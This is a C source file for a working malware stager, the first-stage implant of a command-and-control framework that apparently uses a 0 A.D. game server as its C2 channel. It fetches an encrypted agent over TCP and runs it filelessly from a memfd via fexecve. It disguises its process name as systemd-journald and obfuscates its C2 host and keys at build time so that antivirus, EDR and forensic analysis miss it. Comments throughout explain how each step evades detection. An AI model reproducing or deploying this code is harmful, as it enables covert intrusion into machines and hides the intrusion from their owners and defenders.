/*
 * stager.c — 0adC2 Stager (first-stage implant)
 * ═══════════════════════════════════════════════════════════════════════════
 * ROLE IN ARCHITECTURE:
 *   The stager is the FIRST binary that runs on the target machine. It is
 *   intentionally small (~25 KB) so it is easy to deliver and hard to notice.
 *   Its ONLY job is to fetch the real agent (the full-featured implant) from
 *   the staging server, verify its integrity, and execute it — all without
 *   leaving any file on disk. Once the agent is running, the stager process
 *   is replaced entirely (execve) and ceases to exist.
 *
 *   Think of it as a key that opens a door: the key itself does nothing useful,
 *   but it lets the actual tool (the agent) get in.
 *
 * EXECUTION FLOW:
 *   1. TCP connect to stage_srv on STAGE_PORT.
 *   2. ECDH X25519 (libsodium) → derive a one-time session_key.
 *      Neither side ever sends the session_key over the wire.
 *   3. Receive the agent binary encrypted in 4KB secretbox chunks.
 *      Each chunk is authenticated — any corruption or MITM attempt is caught.
 *   4. Write decrypted agent bytes into a memfd (an anonymous in-memory file).
 *      The agent NEVER touches the filesystem; no disk artifact.
 *   5. fexecve(memfd, argv, environ) — execute the agent directly from the fd.
 *      The stager process image is replaced; the agent now runs with the same
 *      PID and disguised process name.
 *
 * ANTI-FORENSICS:
 *   - No file written to disk (memfd is invisible in /proc/<pid>/maps as a
 *     path; it shows up as "(deleted)" or a kernel-named fd).
 *   - Process name is set to "systemd-journald" to blend with system processes.
 *   - All sensitive constants (stage_host, port, C2 key) are XOR-obfuscated
 *     in the binary by gen_obf.py at build time — strings don't appear in
 *     plaintext, defeating simple `strings` analysis.
 *   - Every build has a different XOR seed → different binary → different hash
 *     → defeats signature-based detection.
 *
 * Build: make stager      (requires gen_obf.py + obf_config.txt)
 * Expected size: ~25 KB stripped, dynamically linked libsodium
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <fcntl.h>
#include <sodium.h>

#include "obf_strings.h"   /* generated by gen_obf.py — host/port/key obfuscated */

/* ── Network helpers ─────────────────────────────────────────────────────────
 * Plain TCP: unlike the C2 channel (ENet/UDP over the game server), the
 * staging channel uses a direct TCP connection to stage_srv. This keeps the
 * stager small (no libenet dependency) and allows a simple sequential protocol:
 * send key → receive key + size → receive chunks. No interleaving needed.
 *
 * recv_exact: loops until exactly 'len' bytes are received. TCP is a stream
 *   protocol — a single recv() call is NOT guaranteed to return all requested
 *   bytes (kernel may split segments). recv_exact() retries until the buffer
 *   is full or the connection dies.
 *
 * send_all: same pattern for send — loop until all bytes are flushed.
 * ─────────────────────────────────────────────────────────────────────────── */
static int tcp_connect(const char *host, int port){
    struct addrinfo hints={0},*res;
    hints.ai_family=AF_INET;hints.ai_socktype=SOCK_STREAM;
    char ps[8];snprintf(ps,sizeof(ps),"%d",port);
    if(getaddrinfo(host,ps,&hints,&res)!=0) return -1;
    int fd=socket(res->ai_family,res->ai_socktype,0);
    if(fd<0){freeaddrinfo(res);return -1;}
    if(connect(fd,res->ai_addr,res->ai_addrlen)<0){
        freeaddrinfo(res);close(fd);return -1;}
    freeaddrinfo(res);return fd;}

static int recv_exact(int fd, void *buf, size_t len){
    size_t got=0;
    while(got<len){
        ssize_t n=recv(fd,(uint8_t*)buf+got,len-got,MSG_WAITALL);
        if(n<=0) return -1;
        got+=(size_t)n;}
    return 0;}

static int send_all(int fd, const void *buf, size_t len){
    size_t sent=0;
    while(sent<len){
        ssize_t n=send(fd,(const uint8_t*)buf+sent,len-sent,0);
        if(n<=0) return -1;
        sent+=(size_t)n;}
    return 0;}

/* ── Secure transfer + memfd execution ──────────────────────────────────────
 * extern char **environ: we declare this explicitly because we need to pass
 * the current process environment to fexecve(). The agent inherits all env
 * vars (PATH, HOME, USER, etc.), which is required for it to function normally.
 * ─────────────────────────────────────────────────────────────────────────── */
extern char **environ;

int main(void){
    if(sodium_init()<0) return 1;

    /* ── Step 1: deobfuscate compiled constants ───────────────────────────
     * The sensitive values (C2 server host, port, encryption key) were XOR'd
     * at build time by gen_obf.py with a per-build random key stored in the
     * binary. OBF_DECODE() reverses that XOR to recover the plaintext at
     * runtime — ONLY in memory, never written anywhere.
     * WHY: static analysis tools and `strings` on the binary see only garbage
     * bytes. An analyst cannot trivially extract the C2 server address.
     * ──────────────────────────────────────────────────────────────────── */
    char stage_host[128],agent_srv_host[128];
    char agent_srv_port[8],agent_player[64],agent_key[128];
    OBF_DECODE(stage_host,     OBF_STAGE_HOST,     OBF_STAGE_HOST_LEN);
    OBF_DECODE(agent_srv_host, OBF_AGENT_SRV_HOST, OBF_AGENT_SRV_HOST_LEN);
    OBF_DECODE(agent_srv_port, OBF_AGENT_SRV_PORT, OBF_AGENT_SRV_PORT_LEN);
    OBF_DECODE(agent_player,   OBF_AGENT_PLAYER,   OBF_AGENT_PLAYER_LEN);
    OBF_DECODE(agent_key,      OBF_AGENT_KEY,       OBF_AGENT_KEY_LEN);
    int stage_port = OBF_STAGE_PORT_VAL;

    /* ── Step 2: ECDH key exchange with stage_srv (X25519) ──────────────────
     * X25519 is a Diffie-Hellman function over Curve25519.
     * HOW IT WORKS (simplified):
     *   - Each side generates a random private key (32 secret bytes).
     *   - Each derives a public key: pub = curve25519_base(priv).
     *     This is a one-way function — you can't recover priv from pub.
     *   - Each side sends its public key to the other.
     *   - Each side computes: shared = curve25519(my_priv, their_pub).
     *     Mathematics guarantees that both sides get the SAME shared value,
     *     even though they only exchanged public keys.
     *   - The shared value is then hashed (with both public keys mixed in)
     *     to produce the final session_key used for symmetric encryption.
     *
     * WHY EPHEMERAL:
     *   randombytes_buf() generates a fresh private key every run.
     *   Even if an attacker records this session and later compromises the
     *   stager binary, they cannot decrypt the captured traffic because the
     *   private key was never stored and no longer exists.
     *   This is called "Perfect Forward Secrecy" (PFS).
     *
     * Protocol sequence:
     *   stager → stage_srv: st_pub (32 bytes)
     *   stage_srv → stager: srv_pub (32 bytes) + total_sz (4 bytes, big-endian)
     * ──────────────────────────────────────────────────────────────────── */
    uint8_t st_priv[32],st_pub[32];
    randombytes_buf(st_priv,32);                              /* random private key */
    crypto_scalarmult_curve25519_base(st_pub,st_priv);        /* derive public key */

    int fd=tcp_connect(stage_host,stage_port);
    if(fd<0) return 1;

    /* Send our public key — this is safe to transmit in the clear */
    if(send_all(fd,st_pub,32)<0){close(fd);return 1;}

    /* Receive server public key + total encrypted payload size */
    uint8_t srv_pub[32];uint32_t total_be;
    if(recv_exact(fd,srv_pub,32)<0||recv_exact(fd,&total_be,4)<0){
        close(fd);return 1;}
    uint32_t total_sz=ntohl(total_be);  /* ntohl: network byte order (big-endian) → host order */
    if(!total_sz||total_sz>32*1024*1024){close(fd);return 1;} /* sanity: max 32MB agent */

    /* Derive session_key = SHA-256(shared || st_pub || srv_pub)
     * WHY hash instead of using shared directly:
     *   1. SHA-256 output is uniformly distributed, hiding any structure in
     *      the raw X25519 output (which is a field element, not pure random).
     *   2. Mixing both public keys into the hash binds the key to THIS session
     *      — prevents key-reuse attacks where an adversary replays a previous
     *      public key to force key reuse.
     * sodium_memzero: securely wipes sensitive variables from RAM after use,
     *   preventing them from being recovered via cold-boot attacks or core dumps. */
    uint8_t shared[32],sess_key[32];
    if(crypto_scalarmult_curve25519(shared,st_priv,srv_pub)!=0){close(fd);return 1;}
    {uint8_t cat[96];
    memcpy(cat,shared,32);memcpy(cat+32,st_pub,32);memcpy(cat+64,srv_pub,32);
    crypto_hash_sha256(sess_key,cat,96);
    sodium_memzero(shared,32);sodium_memzero(cat,96);}  /* wipe ephemeral secrets */

    /* ── Step 3: create an anonymous in-memory file (memfd_create) ──────────
     * memfd_create() — Linux system call (since kernel 3.17):
     *   Creates a file that lives ONLY in RAM, backed by anonymous memory.
     *   It has no path in the filesystem — it cannot be found by `find`, `ls`,
     *   or any filesystem scan. It only exists as a file descriptor number in
     *   the process's fd table (/proc/<pid>/fd/<n>).
     *
     * NAME "[kworker/0:2]":
     *   The name appears in /proc/<pid>/fd/ and in `ls -la /proc/<pid>/fd/`.
     *   Brackets are a convention used by Linux kernel worker threads.
     *   An investigator glancing at /proc/<pid>/fd/ sees what looks like a
     *   kernel thread fd rather than a suspicious anonymous executable.
     *
     * WHY flags=0 (NOT MFD_CLOEXEC):
     *   MFD_CLOEXEC would close the fd automatically on exec() — which is
     *   exactly what we are about to do with fexecve(). If the fd is closed
     *   before the kernel can map the ELF, the exec fails. So we leave it open.
     *
     * ftruncate: pre-allocates the full size in one syscall, more efficient
     *   than letting write() grow the file incrementally.
     * lseek to 0: rewind to the beginning before writing the first chunk.
     * ──────────────────────────────────────────────────────────────────── */
    int mfd=memfd_create("[kworker/0:2]",0);
    if(mfd<0){close(fd);return 1;}
    if(ftruncate(mfd,(off_t)total_sz)<0){close(fd);close(mfd);return 1;}
    lseek(mfd,0,SEEK_SET);

    /* ── Step 4: receive and decrypt agent chunks ────────────────────────────
     * Wire format per chunk:
     *   [enc_len : 4 bytes, big-endian]          ← length of what follows
     *   [nonce   : 24 bytes]                     ← random, unique per chunk
     *   [mac     : 16 bytes]                     ← authentication tag (Poly1305)
     *   [ciphertext: enc_len - 24 - 16 bytes]    ← XSalsa20-encrypted payload
     *
     * secretbox (XSalsa20-Poly1305) is an AEAD cipher:
     *   - AEAD = Authenticated Encryption with Associated Data.
     *   - It both ENCRYPTS (confidentiality) and AUTHENTICATES (integrity).
     *   - The 16-byte MAC (message authentication code) is a cryptographic
     *     checksum that covers the ciphertext. If a single byte is tampered
     *     with in transit, decryption returns an error instead of garbage.
     *   - WHY this matters: a MITM who intercepts the TCP stream cannot inject
     *     a modified agent — it would fail MAC verification and we would abort.
     *
     * nonce (number used once):
     *   XSalsa20 requires a unique 24-byte nonce per encryption. stage_srv
     *   generates a random nonce for each chunk and prepends it to the
     *   ciphertext. We pass it to crypto_secretbox_open_easy() for decryption.
     *   CRITICAL: the nonce must NEVER be reused with the same key — doing so
     *   would allow an attacker to XOR two ciphertexts and recover the key.
     *   Using randombytes_buf() per chunk makes reuse astronomically unlikely.
     *
     * Chunk size limit check: enforces the expected 4096-byte plaintext max
     * plus the fixed overhead. Anything outside this range is malformed/hostile.
     * ──────────────────────────────────────────────────────────────────── */
    uint32_t received=0;
    while(received<total_sz){
        uint32_t enc_len_be;
        if(recv_exact(fd,&enc_len_be,4)<0) break;
        uint32_t enc_len=ntohl(enc_len_be);
        /* Validate: must be at least nonce+mac overhead, and at most 4KB + overhead */
        if(enc_len<crypto_secretbox_NONCEBYTES+crypto_secretbox_MACBYTES||
           enc_len>4096+crypto_secretbox_NONCEBYTES+crypto_secretbox_MACBYTES) break;

        uint8_t *enc=(uint8_t*)malloc(enc_len);
        if(!enc) break;
        if(recv_exact(fd,enc,(size_t)enc_len)<0){free(enc);break;}

        size_t ptlen=enc_len-crypto_secretbox_NONCEBYTES-crypto_secretbox_MACBYTES;
        uint8_t *plain=(uint8_t*)malloc(ptlen);
        if(!plain){free(enc);break;}

        /* Decrypt and authenticate: enc[0..23] = nonce, enc[24..] = mac+ciphertext.
         * Returns 0 on success, -1 if MAC verification fails (data corrupted/tampered). */
        if(crypto_secretbox_open_easy(
                plain,
                enc+crypto_secretbox_NONCEBYTES,       /* mac + ciphertext */
                enc_len-crypto_secretbox_NONCEBYTES,   /* mac + ciphertext length */
                enc,                                   /* nonce */
                sess_key)!=0){
            free(enc);free(plain);break;}              /* MAC fail → abort */

        if(write(mfd,plain,(size_t)ptlen)!=(ssize_t)ptlen){
            free(enc);free(plain);break;}
        received+=(uint32_t)ptlen;
        free(enc);free(plain);}

    close(fd);                           /* staging connection no longer needed */
    sodium_memzero(sess_key,32);         /* wipe session key from RAM immediately */

    if(received<total_sz){close(mfd);return 1;}

    /* ── Step 5: execute agent from the memfd (fileless execution) ──────────
     * fexecve(fd, argv, envp):
     *   Like execve() but takes a FILE DESCRIPTOR instead of a filesystem path.
     *   The kernel reads the ELF binary directly from the fd — from RAM — and
     *   replaces the current process image with it. No path needed, no disk read.
     *
     *   WHY fileless:
     *     - No file created on disk → no artifact for AV, EDR, or IR to find.
     *     - /proc/<pid>/exe still points to "(deleted)" or the memfd name,
     *       revealing nothing about the real binary.
     *     - Process memory (RSS) is the only trace — it disappears when killed.
     *
     * argv[] passed to the agent:
     *   argv[0] = "systemd-journald"  ← process name (seen in `ps`, `top`).
     *             16 chars exactly: leaves enough buffer space for the agent's
     *             spoof_name() to overwrite it with whatever fits (e.g. "kworker/u4:3").
     *             Overwrite is done via prctl(PR_SET_NAME) + direct argv[0] memcpy.
     *   argv[1] = agent_srv_host      ← 0AD game server host for the C2 channel.
     *   argv[2] = agent_srv_port      ← port (ENet/UDP).
     *   argv[3] = agent_player        ← player name to show in the game lobby.
     *   argv[4] = agent_key           ← pre-shared key for v4 encryption / auth.
     *   argv[5] = NULL                ← execve convention: argv must be NULL-terminated.
     *
     * Fallback via /proc/self/fd/<n>:
     *   On kernels older than ~4.14 (or under certain seccomp policies),
     *   fexecve() may not be available or may be blocked. execve() on the
     *   /proc/self/fd/<n> path achieves the same result through the procfs
     *   symlink. This path IS filesystem-based, but the fd it points to is
     *   still the anonymous memfd — no permanent file.
     * ──────────────────────────────────────────────────────────────────── */
    char _a0[17]="systemd-journald";  /* 16 chars — agent's spoof_name() can overwrite */
    char *argv[]={
        _a0,
        agent_srv_host,    /* C2 server host */
        agent_srv_port,    /* C2 server port */
        agent_player,      /* lobby player name */
        agent_key,         /* pre-shared C2 key */
        NULL};
    fexecve(mfd,argv,environ);  /* replaces this process with the agent; no return on success */

    /* fexecve() failed (old kernel, seccomp, etc.) — try procfs path as fallback */
    char fd_path[32];
    snprintf(fd_path,sizeof(fd_path),"/proc/self/fd/%d",mfd);
    execve(fd_path,argv,environ);

    /* Both exec paths failed — nothing we can do */
    close(mfd);
    return 1;}
